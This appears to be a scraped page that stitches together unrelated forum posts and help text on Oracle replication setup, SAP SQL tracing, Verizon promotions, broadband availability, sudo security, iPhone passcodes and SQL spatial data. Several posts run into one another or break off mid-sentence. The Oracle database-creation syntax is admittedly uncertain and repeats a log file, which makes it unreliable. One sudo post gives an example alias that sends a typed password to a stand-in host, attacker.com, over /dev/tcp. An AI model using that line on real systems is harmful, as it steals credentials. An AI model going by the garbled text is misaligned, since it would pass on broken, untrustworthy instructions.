Catrep.sql - who/what/how?
I hate to sound like a bloomin' idiot, but during
post installation, after running root.sh, how does
one run catrep.sql as root?
I start svrmgrl, it does fine. I type @catrep.sql while in
the $ORACLE_HOME/rdbms/admin directory (where catrep is),
and get the message "Oracle not available."
I opted for the custom installation, installed EVERYTHING,
no errors during install until now. I did not create a
database yet. Does one need a database to run catrep?
Thanks to all for humoring this probably very simple

Bill: YES! you need a Database to run something against it.
Anyway, wht you need to do is create the database
(create init File, startup (no mount), create the database
(create database XXXX
control file '/u01/oradata/XXXX/system1.dbf' size 50m
log group 1 ('/u01/oradata/XXXX/log01','/u01/oradata/XXXX/log02')
size 500k,
group 2 ('/u02/oradata/XXXX/log03', '/u02/oradata/XXXX/log03')
size 500k
(I'm not quite sure of the sintaxis, I know it quite like that
but can't and don't guarantee it!)
After this you have a mounted database, then just type from the
SRVMGRL:
@$ORACLE_HOME/rdbms/admin/catrepHope it helps.

SQL Trace transaction ST05: The trace list has many lines that are not related to the SELECT statement in the ABAP program. This is because the execution of any ABAP program requires additional administrative SQL calls. To restrict the list output, use the filter introducing the trace list.
The trace list contains different SQL statements simultaneously related to the one SELECT statement in the ABAP program. This is because the R/3 Database Interface - a sophisticated component of the R/3 Application Server - maps every Open SQL statement to one or a series of physical database calls and brings it to execution. This mapping, crucial to R/3s performance, depends on the particular call and database system. For example, the SELECT-ENDSELECT loop on a particular database table of the ABAP program would be mapped to a sequence PREPARE-OPEN-FETCH of physical calls in an Oracle environment.
The WHERE clause in the trace list's SQL statement is different from the WHERE clause in the ABAP statement. This is because in an R/3 system, a client is a self-contained unit with separate master records and its own set of table data (in commercial, organizational, and technical terms). With ABAP, every Open SQL statement automatically executes within the correct client environment. For this reason, a condition with the actual client code is added to every WHERE clause if a client field is a component of the searched table.
To see a statement's execution plan, just position the cursor on the PREPARE statement and choose Explain SQL. A detailed explanation of the execution plan depends on the database system in use.
Run time analysis transaction SE30 :This transaction gives all the analysis of an ABAP program with respect to the database and the non-database processing.
STEPS
Run time analysis transaction SE30
In Transaction SE30, fill in the transaction name or the program name which needs to be analyzed for performance tuning.
For our case, let this be ZABAP_PERF_TUNING
After giving the required inputs to the program, execute it. After the final output list has been displayed, PRESS the BACK button.
On the original SE30 screen, now click on ANALYZE button.
The percentage across each of the areas ABAP/ Database/System shows the percentage of total time used for those areas and load on these areas while running the program . The lesser the database load faster the program runs.
SQL Trace ST05
Starting the Trace:
To analyze a trace file, do the following:
Choose the menu path Test Performance Trace in the ABAP Workbench or go to Transaction ST05. The initial screen of the test tool appears. In the lower part of the screen, the status of the Performance Trace is displayed. This provides you with information as to whether any of the Performance Traces are switched on and the users for which they are enabled. It also tells you which user has switched the trace on.
Using the selection buttons provided, set which trace functions you wish to have switched on (SWL trace, enqueue trace, RFC trace, table buffer trace).
If you want to switch on the trace under your user name, choose Trace on. If you want to pass on values for one or several filter criteria, choose Trace with Filter.
Typical filter criteria are: the name of the user, transaction name, process name, and program name.
Now run the program to be analyzed.
Stopping the Trace:
To deactivate the trace:
Choose Test Performance Trace in the ABAP Workbench. The initial screen of the test tool appears. It contains a status line displaying the traces that are active, the users for whom they are active, and the user who activated them.
Select the trace functions that you want to switch off.
Choose Deactivate Trace. If you started the trace yourself, you can now switch it off immediately. If the performance trace was started by a different user, a confirmation prompt appears before deactivation-
Analyzing a Sample trace data: PREPARE: Prepares the OPEN statement for use and determines the access method.
OPEN: Opens the cursor and specifies the selection result by filling the selection fields with concrete values.
FETCH: Moves the cursor through the dataset created by the OPEN operation. The array size displayed beside the fetch data means that the system can transfer a maximum package size of 392 records at one time into the buffered area. -
About once a month I receive the Software update notice that has failed. How do I find out who/what is trying to update? If I decided I want this update how do I allow it to continue? If I decided I do not want this update how do I stop it and its attempt to update? The only response allowed is "OK". When OK is selected the window goes away and nothing else happens.

Yes your cabinet 10 on the Crediton exchange has already been installed and linked with a FTTC DSLAM cabinet (making it able to provide FTTC fibre broadband) and has been Accepting FTTC orders since December 2013. PCP10 (with it's DSLAM cabinet within 100meters of it) is locate on the junction of Commercial Road and the A3072.
However by the looks of things your are just too far away to obtain a FTTC (VDSL2) connection, meaning FTTC fibre broadband is not available to you.

How to determine via SQL who created the sales order

Everything is up and running and works but
I still can not Connect Internal from server Manager
or connect from sqlplus scott/tiger when I am root.

In our town we have two retailers which are literally blocks mile from each other; Verizon Wireless 76 Dodge St., 01915 and Verizon Wireless at 136 Dodge St., 01915. I'm sifting through the VWZ website to better understand the promotion and to better understand given the information shared at "Verizon Wireless 136 Dodge St....".
I've been a customer of VWZ for years and have opted not to go to 76 Dodge St. given the years of poor customer service experience at that particular location and return to 136 Dodge St given their great customer service. Now I read your posting as I comb through the readings to learn more about the promotion to help better understand who, what and under what circumstances you are eligible to receive the promotional upgrade.
I only went to the store today given the VWZ website did not allow me to change my plan to from nationwide to single place and pre-order the phone. My frustration mounted when I went to the store I was at today stated VWZ "misinformed the public..." and the $200 upgrade really should really have read, "...receive up to a $200 refund..." -- that is, I would only receive the cost of the appraised value of the iPhone 4S which is only know after I submit the item to VWZ. Here I read this post which you indicate it's only available at "Verizon Wireless" which leaves be baffled - does this include authorized retailers who print receipts stating "Verizon Wireless, 136 Dode St... or what? The only reason why I remained with VMZ (it wasn't for the customer service), was the promotional offer and the new single plan being offered. If this is not the case, I like to void this order (which I won't be surprised I'll be charged) and start shopping around at other carriers. I admit this promotional offering is very clear with no clear indication on who, what and under what circumstance you are eligible and the cost you will encounter.nickleu wrote:

I think NOEXEC is the sudo option you're looking for. It prevents sudo processes from spawning child processes, which may or may not be a shell. Use it in conjunction with a specific, known-to-be-secure command line, and you can mitigate the problem you're talking about. Personally, I don't use su nor sudo anymore. Instead I log into my passwordless root account from another TTY, which getty permits by default. su and ssh deny access to passwordless accounts, so I don't really see it as a security problem.
Furthermore, I think your concern is misplaced: if someone had access to your user password, there is far more he or she could do beyond using sudo (install a keylogger, alias sudo='read -p Password > /dev/tcp/attacker.com/1234', gdb(1), ptrace(2), etc). More realistic threats are usually those involving privilege escalation by other users or programs without the use of su/sudo.
Edit: see also man sudo(1) and sudoers.conf(5).

Hi - I need help. I would like to use my old iPhone 3 as an iPod for music only. Problem is that my phone is locked with a password I can't remember. I havent used the phone since I got my iPhone 4. The problem is I don't remember the password. When I connect it to iTunes it tell me that I have to write the password before it can be used with iTunes...... Do you have any good ideas? cd $ORACLE_HOME/rdbms/admin
svrmgrl sys/password (or connect internal)
@catrepr

This will remove all exisiting replication objects and
re-create.

There have been fixes released for the JRC and Crystal Reports for Eclipse. Currently we are at Patch 5; if you are n't at that level (or aren't sure what level you are at) I would suggest first upgrading your product. This can be done through the Update Manager in the IDE.
If the issue still occurs, it may have been fixed in our next release of Crystal Reports for Eclipse, which is currently publicly available as an Alpha release from the following place:

i have a problem with mail. the spelling and grammer check box before sending the messege is no longer there. I did everything but cannot get it back. is ther anyone who knows how to get the box with spelling and grammer checks before sending the mail.
Also the mail is acting very funny by not getting the rules work in a proper method. Is ther a software to repair mail.i did both of them, but still the while sending the mail the diolog box is not showing up and also the spelling and grammer does not do the spelling check.

Thanks!I attached a SubVI which I used to place an overlay next to a Pattern, found by a Pattern Match before:
As you can see, you simply pass the image reference and the Array of Matches to the VI along with the String you want to have as an overlay next to the Match.
I also modified your VI a bit, but didn't test it. I created an Array of clusters, each elment containing the template path along with the respective text.
Please note that this is just a hint!

In my app (WP 8.1) i have to store user location (lat,lon) in sql db so how can i store that location detail? And i also have to find all the location which are inside certain radius X from another user location, How can i do this?
Any Sample project or code or any blog post?
P.S. I use sql server 2012.If you need to do spatial queries like the one you mentioned you'd need to store it as a spatial geography type. For points, a simple SQL INSERT statement using the Point() method would do it. Example here:
